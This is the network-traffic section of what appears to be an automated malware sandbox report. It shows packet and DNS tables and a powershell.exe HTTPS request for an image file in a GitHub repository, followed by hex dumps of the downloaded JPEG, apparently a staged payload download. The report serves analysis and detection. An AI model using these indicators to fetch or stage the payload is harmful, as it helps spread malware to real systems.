Oct 7, 2024 09:33:23.416255951 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.416354895 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.416361094 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.416685104 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.416733027 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.416790009 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.416798115 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.416831017 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.417222977 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.417262077 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.417295933 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.417346001 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.417346001 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.417355061 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.417454004 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.417675972 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.417690992 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.417718887 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.417797089 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.417797089 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.417804003 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.418148994 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.418165922 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.418311119 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.418318033 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.418514013 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.418529034 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.418600082 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.418606043 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.458349943 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.502497911 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.502517939 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.502547979 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.502604008 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.502615929 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.502655983 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.502881050 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.502899885 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.503007889 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.503007889 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.503015995 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.503232002 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.503246069 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.503365040 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.503371000 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.503622055 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.503643990 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.503710985 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.503720999 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504029036 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504041910 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504101992 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.504110098 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504370928 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504389048 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504441023 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.504447937 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504501104 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.504710913 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504744053 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504775047 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.504780054 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504868031 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.504900932 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504946947 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.504993916 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.505002022 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.505074978 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.549452066 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.549458027 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.589905024 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.589922905 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.590043068 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.590053082 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.590379953 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.590395927 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.590424061 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.590496063 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.590496063 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.590507030 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.590903044 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.590924025 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.591027975 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.591037035 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.591525078 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.591557026 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.591598034 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.591604948 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.591639996 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.591670036 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.591676950 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.591726065 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.591732979 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.591762066 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.592154026 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592201948 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592231035 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.592237949 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592251062 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592262983 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.592322111 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.592632055 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592669010 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592695951 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592739105 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592780113 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.592787981 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592797995 CEST  443  49760  16.182.70.97  192.168.2.6
Oct 7, 2024 09:33:23.592842102 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.592842102 CEST  49760  443  192.168.2.6  16.182.70.97
Oct 7, 2024 09:33:23.593270063 CEST  49760  443  192.168.2.6  16.182.70.97
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Oct 7, 2024 09:33:16.301242113 CEST  63977  53  192.168.2.6  1.1.1.1
Oct 7, 2024 09:33:16.307971954 CEST  53  63977  1.1.1.1  192.168.2.6
Oct 7, 2024 09:33:21.055862904 CEST  61200  53  192.168.2.6  1.1.1.1
Oct 7, 2024 09:33:21.062531948 CEST  53  61200  1.1.1.1  192.168.2.6
Oct 7, 2024 09:33:22.267725945 CEST  53926  53  192.168.2.6  1.1.1.1
Oct 7, 2024 09:33:22.289293051 CEST  53  53926  1.1.1.1  192.168.2.6
Oct 7, 2024 09:33:43.916111946 CEST  53  58101  162.159.36.2  192.168.2.6
Oct 7, 2024 09:33:44.416160107 CEST  53576  53  192.168.2.6  1.1.1.1
Oct 7, 2024 09:33:44.424261093 CEST  53  53576  1.1.1.1  192.168.2.6
Timestamp  Source IP  Dest IP  Trans ID  OP Code  Name  Type  Class  DNS over HTTPS
Oct 7, 2024 09:33:16.301242113 CEST  192.168.2.6  1.1.1.1  0x4371  Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:21.055862904 CEST  192.168.2.6  1.1.1.1  0xcc35  Standard query (0)  bitbucket.org  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.267725945 CEST  192.168.2.6  1.1.1.1  0x1bf2  Standard query (0)  bbuseruploads.s3.amazonaws.com  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:44.416160107 CEST  192.168.2.6  1.1.1.1  0x5c30  Standard query (0)  18.31.95.13.in-addr.arpa  PTR (Pointer record)  IN (0x0001)  false
Timestamp  Source IP  Dest IP  Trans ID  Reply Code  Name  CName  Address  Type  Class  DNS over HTTPS
Oct 7, 2024 09:33:16.307971954 CEST  1.1.1.1  192.168.2.6  0x4371  No error (0)  raw.githubusercontent.com  -  185.199.111.133  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:16.307971954 CEST  1.1.1.1  192.168.2.6  0x4371  No error (0)  raw.githubusercontent.com  -  185.199.110.133  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:16.307971954 CEST  1.1.1.1  192.168.2.6  0x4371  No error (0)  raw.githubusercontent.com  -  185.199.108.133  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:16.307971954 CEST  1.1.1.1  192.168.2.6  0x4371  No error (0)  raw.githubusercontent.com  -  185.199.109.133  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:21.062531948 CEST  1.1.1.1  192.168.2.6  0xcc35  No error (0)  bitbucket.org  -  185.166.143.48  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:21.062531948 CEST  1.1.1.1  192.168.2.6  0xcc35  No error (0)  bitbucket.org  -  185.166.143.50  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:21.062531948 CEST  1.1.1.1  192.168.2.6  0xcc35  No error (0)  bitbucket.org  -  185.166.143.49  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  bbuseruploads.s3.amazonaws.com  s3-1-w.amazonaws.com  -  CNAME (Canonical name)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-1-w.amazonaws.com  s3-w.us-east-1.amazonaws.com  -  CNAME (Canonical name)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-w.us-east-1.amazonaws.com  -  16.182.70.97  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-w.us-east-1.amazonaws.com  -  3.5.28.193  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-w.us-east-1.amazonaws.com  -  52.216.249.76  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-w.us-east-1.amazonaws.com  -  52.216.215.1  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-w.us-east-1.amazonaws.com  -  3.5.25.131  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-w.us-east-1.amazonaws.com  -  52.217.172.201  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-w.us-east-1.amazonaws.com  -  54.231.224.49  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:22.289293051 CEST  1.1.1.1  192.168.2.6  0x1bf2  No error (0)  s3-w.us-east-1.amazonaws.com  -  16.182.72.209  A (IP address)  IN (0x0001)  false
Oct 7, 2024 09:33:44.424261093 CEST  1.1.1.1  192.168.2.6  0x5c30  Name error (3)  18.31.95.13.in-addr.arpa  none  none  PTR (Pointer record)  IN (0x0001)  false
                                                        • raw.githubusercontent.com
                                                        • bitbucket.org
                                                        • bbuseruploads.s3.amazonaws.com
Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
0  192.168.2.6  49725  185.199.111.133  443  5664  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp  Bytes transferred  Direction  Data
2024-10-07 07:33:16 UTC  117  OUT  GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1
                                                        Host: raw.githubusercontent.com
                                                        Connection: Keep-Alive
2024-10-07 07:33:17 UTC  887  IN  HTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 2578503
                                                        Cache-Control: max-age=300
                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                        Content-Type: image/jpeg
                                                        ETag: "ba4b733aa1ad403bc9cacb2a172994a886bea7b08e7a7dfb33ae1618861cbf3e"
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-Content-Type-Options: nosniff
                                                        X-Frame-Options: deny
                                                        X-XSS-Protection: 1; mode=block
                                                        X-GitHub-Request-Id: C0A1:9717F:209D27:231F7D:67038EBC
                                                        Accept-Ranges: bytes
                                                        Date: Mon, 07 Oct 2024 07:33:16 GMT
                                                        Via: 1.1 varnish
                                                        X-Served-By: cache-ewr-kewr1740073-EWR
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1728286397.890157,VS0,VE77
                                                        Vary: Authorization,Accept-Encoding,Origin
                                                        Access-Control-Allow-Origin: *
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        X-Fastly-Request-ID: 55472cea01be5c2ea00f60986e895ff7e260b055
                                                        Expires: Mon, 07 Oct 2024 07:38:16 GMT
                                                        Source-Age: 0
                                                        2024-10-07 07:33:17 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01
                                                        Data Ascii: JFIF,,ExifMM*CCp"_!
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 24 18 1e 91 51 6f 5a c4 83 c0 9a 67 14 d0 b7 13 58 bc c9 51 49 0b 24 fe 82 ac 98 bc c8 5a 09 07 9e dc d5 02 dd e2 d3 9d e0 fd 4d 4e e3 ef c0 48 f3 07 cc 71 55 ad a7 82 c4 2d 34 4c 65 ef 88 13 f3 00 a1 c8 9a 9b c6 e4 4a 09 2a 50 93 c5 67 b8 dc d4 04 93 bb 81 e6 6a 7a cb 32 1c 03 9e 3b 1a ca bb 4b f2 5c ae ec 17 66 6f d2 e2 c9 07 81 db 9a 77 6d 91 9e 27 81 ef 55 16 72 68 20 6d 51 e0 53 db 5c 9e c5 70 7b f7 ac eb 34 a5 c8 5c 99 72 b6 c9 a5 6a 09 dd 13 db 9a 92 b1 c8 04 b8 08 51 1e 51 35 4d b4 c9 25 6a 32 44 cf 11 52 56 b9 12 81 24 f3 ea 6b 3e dd 31 34 6d 45 da cf 20 82 a0 24 26 7d 2a 4e de e4 00 40 33 f9 d5 22 cb 2a 54 52 b2 b1 c1 a9 cc 7e 60 38 90 24 92 0f 27 da b3 ed d3 63 82 c2 b0 b2 b6 f9 09 10 7b 89 26 69 eb 37 90 00 2a 9e 3e 95 5f 62 ed 25 00 85 73 e5
                                                        Data Ascii: $QoZgXQI$ZMNHqU-4LeJ*Pgjz2;K\fowm'Urh mQS\p{4\rjQQ5M%j2DRV$k>14mE $&}*N@3"*TR~`8$'c{&i7*>_b%s
                                                        2024-10-07 07:33:17 UTC1378INData Raw: d3 36 fb 95 ce d3 e7 dc d1 db 67 fa 7c 8f 9d 42 e5 82 45 1c 8d 9a b4 51 50 e6 38 a5 3e e4 4a 7c b9 ef ef 4f 19 68 25 24 9f 2e dc d1 cb 32 92 02 b7 03 dc 11 11 4d 91 da c7 04 63 d6 9c 92 08 ef 13 4c ee 99 da 24 80 ae fd 8d 4a dc 32 12 83 c7 3d a3 bd 47 df c0 90 0c 77 f6 a9 ea 7d 88 e5 f8 2b 59 44 43 ca 06 15 35 0e f3 24 dc 42 40 ef 56 1c 9b 33 bb 90 66 a2 14 d0 4a b9 24 41 e6 2b 42 a9 60 83 01 98 64 18 22 02 92 3f 4a 92 b2 b5 da 67 ba 7b c7 95 34 b7 46 e5 90 07 35 25 6a df 1e fe d4 ac 7c 88 70 cb 13 12 39 fa d4 a5 83 40 24 13 c1 9a 67 6e 81 c9 90 94 f1 52 56 ed a4 01 04 89 20 fe 95 42 d6 4d 0e e4 a6 3f 97 01 3c c1 e0 d4 e6 39 3f cc 9d c4 8f 7a 81 b3 3b 52 23 cf f2 a9 9c 59 da b1 ef 59 97 47 25 98 48 b0 32 90 1a 04 7f ed a3 bc 99 41 88 07 d6 9b 5b bf bd 20
                                                        Data Ascii: 6g|BEQP8>J|Oh%$.2McL$J2=Gw}+YDC5$B@V3fJ$A+B`d"?Jg{4F5%j|p9@$gnRV BM?<9?z;R#YYG%H2A[
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 8e 4a 64 d7 92 d8 9e f0 45 33 42 12 f0 c9 23 88 9f 78 a3 a2 dc 92 78 fd e9 54 b4 24 19 3f 4a 55 b6 b6 aa 3f 3a 61 2e e3 74 5b 13 27 b7 95 1c 5b d3 94 b1 c7 3c c7 bd 1d 0c 00 a1 00 8a 61 f0 34 16 b0 8f 51 33 47 4b 45 24 1e 38 e3 eb 4e 9b b6 fa 8f de 8c 2d 79 fe 93 f5 a6 ca 1d 44 41 0c 00 92 3c cc d3 86 d9 26 38 ef 47 43 1e 7e 54 b2 59 00 8e 60 9a 8e 4c 20 5b 66 12 27 bd 2c da 4e d1 20 40 f7 af 36 80 90 47 04 fb 9e d4 a3 68 fe 58 93 1e f5 14 98 85 19 1c cf 03 e9 4a 34 9e 3d 7d 3e 94 54 20 05 7e 5e bc 52 ed 08 1c 77 a8 98 85 52 9f 98 79 4d 2e d9 db 3e 54 92 47 cf f9 52 81 3f 28 f5 91 4c 21 64 02 76 82 4f d6 3b 52 cd 88 4c 70 07 bd 26 d2 78 1f 48 a5 d9 4c 9f 38 ef 4b 3e 07 4c 59 a4 46 de 07 f9 52 88 68 11 07 88 33 e9 45 68 02 07 a8 a5 db 4c 02 01 35 13 ee 12
                                                        Data Ascii: JdE3B#xxT$?JU?:a.t['[<a4Q3GKE$8N-yDA<&8GC~TY`L [f',N @6GhXJ4=}>T ~^RwRyM.>TGR?(L!dvO;RLp&xHL8K>LYFRh3EhL5
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 95 3f 71 a0 a0 48 ef f5 a6 eb 42 52 0f 3c 1e e6 6a 64 c6 19 b8 90 90 67 f4 f2 a4 96 ce d8 e0 71 c5 3b 5b 61 20 9f 23 c0 a4 d6 d0 28 10 7c fb cd 16 46 68 68 b6 41 41 f9 79 f4 9e d4 9a 98 f2 20 03 dc 0a 78 a6 46 d2 00 04 0f 32 4d 26 e3 5b bb 00 67 f6 a2 c8 29 7c 8d 14 d9 90 08 04 1e 68 a5 8e f1 00 27 9a 74 2d c8 32 41 8f 28 f2 af 1b 71 23 eb cd 3e e1 34 35 f0 26 47 12 3d 3c e8 a1 93 b4 f0 29 e1 b7 f9 b8 3d bb f1 44 5b 69 4a 79 54 d2 c8 d8 1a 86 bf 98 78 1c 9a 21 47 ca 0c f7 34 ec b7 24 41 fa 99 e0 d1 54 da 60 fa 0a 25 2f 91 f0 86 c1 82 7b 89 99 ee 68 85 8d d3 f5 a7 7f 77 24 9e 3c a2 7d 6b ce 31 02 79 81 4e 98 b0 30 fb b6 d5 a7 ce 8a ab 7d 80 9f 39 fd 29 f1 64 2d 5c 72 12 68 0b 30 4c f6 34 fb 86 23 9e 60 01 c8 1c 7b 52 4b 60 02 60 77 fa f1 52 6e 5b ed 20 77
                                                        Data Ascii: ?qHBR<jdgq;[a #(|FhhAAy xF2M&[g)|h't-2A(q#>45&G=<)=D[iJyTx!G4$AT`%/{hw$<}k1yN0}9)d-\rh0L4#`{RK``wRn[ w
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 3e b6 70 73 07 cb 9a 8e 6d 44 79 4d 38 b7 70 c4 81 07 fb d4 6d 06 4b 5a be 5b 3c 49 9e 40 9a 9e c5 27 e5 49 51 12 07 61 55 76 6e 36 41 1e 5e 95 31 8f bf de 90 07 11 e8 6a bd 8b e0 24 c9 f1 0a 71 04 76 3d c5 3e b6 64 a8 48 24 01 e9 51 b8 fb b4 ba be 47 20 7a d4 8b 4f 04 98 98 3f 5a 81 a6 10 f4 38 10 60 99 a2 15 00 66 7b f3 49 3a ec f1 27 f2 ed 44 2e 84 cc 77 a8 c9 32 1d d5 02 a9 f2 3c 53 75 10 41 f2 22 85 6e 40 04 77 f7 a4 d6 e6 e1 db bf 07 da 90 84 d6 42 79 3e 73 34 92 d4 53 13 dc 8e d4 67 7f 01 e4 71 48 ba a9 51 24 89 ed 1e b4 84 11 c5 cc 9a 49 c5 03 04 9e dc 51 d6 24 11 c5 22 e7 2a 1c 0f d6 90 32 00 ae 24 99 91 e5 49 a9 41 07 82 4c 9f 5a f1 30 99 9e 4d 26 a5 98 82 3b d1 a5 80 41 71 72 a3 c9 fd 68 8b 7a 04 49 8a 05 9d d3 fa f1 49 19 0a 04 76 f5 f4 a2 4b
                                                        Data Ascii: >psmDyM8pmKZ[<I@'IQaUvn6A^1j$qv=>dH$QG zO?Z8`f{I:'D.w2<SuA"n@wBy>s4SgqHQ$IQ$"*2$IALZ0M&;AqrhzIIvK
                                                        2024-10-07 07:33:17 UTC1378INData Raw: 10 80 b2 3e 6a 14 88 10 4c 81 42 e2 1a 90 a2 49 1b 61 52 93 ef 4e 1a 74 25 60 cc 73 c5 32 4a 22 61 71 3e 86 8e d1 da a0 93 c9 ee 2a 37 5f 04 b1 b0 95 b7 c9 a9 b5 94 a0 c0 1d f9 ef 56 0c 46 66 52 01 5c 71 54 e4 a9 53 cc 83 e4 69 7b 7b d5 b0 a1 27 b7 bd 54 9d 09 f6 2c 43 53 8e e5 f9 19 14 bb dd 52 0f 7e 4d 11 57 28 1d 88 91 ef 55 5b 2c ea e4 c9 3c 0f 5a 92 b6 bd 0e b6 92 4f 33 eb 54 e5 43 45 b5 a8 52 e0 97 45 c6 e5 c7 63 e5 e9 14 72 0a 92 62 3b cd 46 26 f8 23 cf b7 94 f7 a5 d9 c8 c9 f2 8f de a1 75 70 49 1b 18 f9 2e c4 47 04 f7 e4 d7 ad 32 4e 33 76 02 56 a2 27 8a 6a a7 cb 84 c9 20 0e c4 77 a5 59 28 2a 04 9e 0f 78 10 47 bd 41 3a 89 e1 63 2f 18 3c a7 de 6d 80 57 70 39 9a 7e eb a7 67 f2 ff 00 0a 6a b3 8c bf 09 60 00 40 80 05 4b d9 e5 00 24 6f 91 e9 da b3 ed a7
                                                        Data Ascii: >jLBIaRNt%`s2J"aq>*7_VFfR\qTSi{{'T,CSR~MW(U[,<ZO3TCEREcrb;F&#upI.G2N3vV'j wY(*xGA:c/<mWp9~gj`@K$o
                                                        2024-10-07 07:33:17 UTC1378INData Raw: bb 6e 1c 52 88 91 ed 48 38 c4 0f 41 52 ae da 11 3c f7 a4 57 6b b4 73 24 cd 4f 19 11 b8 fc 91 2e 5b 85 15 79 1a 6b 73 6f 06 23 89 e2 a5 dd b6 85 1e f1 ed 4d 2e ed ca 93 31 31 d8 0a b5 5c f2 41 35 82 19 6d 92 a2 00 04 77 92 69 25 33 12 26 7f 3e d4 fe e2 d3 69 31 22 69 aa db d8 b1 c4 03 e7 da ad 42 5c 11 31 a2 db da a0 7b 01 db de a2 b3 03 74 93 cc 9a 97 b8 4c 24 f2 60 7f f2 35 17 91 40 58 3f e5 57 2b 21 97 62 05 c6 a1 c5 12 20 1f 4a 21 82 78 23 89 a7 57 8d 02 a1 06 62 9a b8 12 8f c3 03 cb 8f 3a d0 af b1 08 d5 c7 c7 8e 11 24 10 3d 38 a5 90 b1 20 48 ed eb 49 bc 80 ae 49 e7 eb 48 1b 8f 09 64 00 0c 7b c7 ef 53 a4 03 ee 3b 2b 85 f0 af 3e d4 76 9d 1b 7b 83 f4 f2 f6 a6 0b bd 95 4f cb cf d6 bd f7 a2 be c7 8f 21 d8 d1 6d 18 94 49 49 5f 24 09 ed 4b b0 a0 a5 41 3f 32
                                                        Data Ascii: nRH8AR<Wks$O.[ykso#M.11\A5mwi%3&>i1"iB\1{tL$`5@X?W+!b J!x#Wb:$=8 HIIHd{S;+>v{O!mII_$KA?2
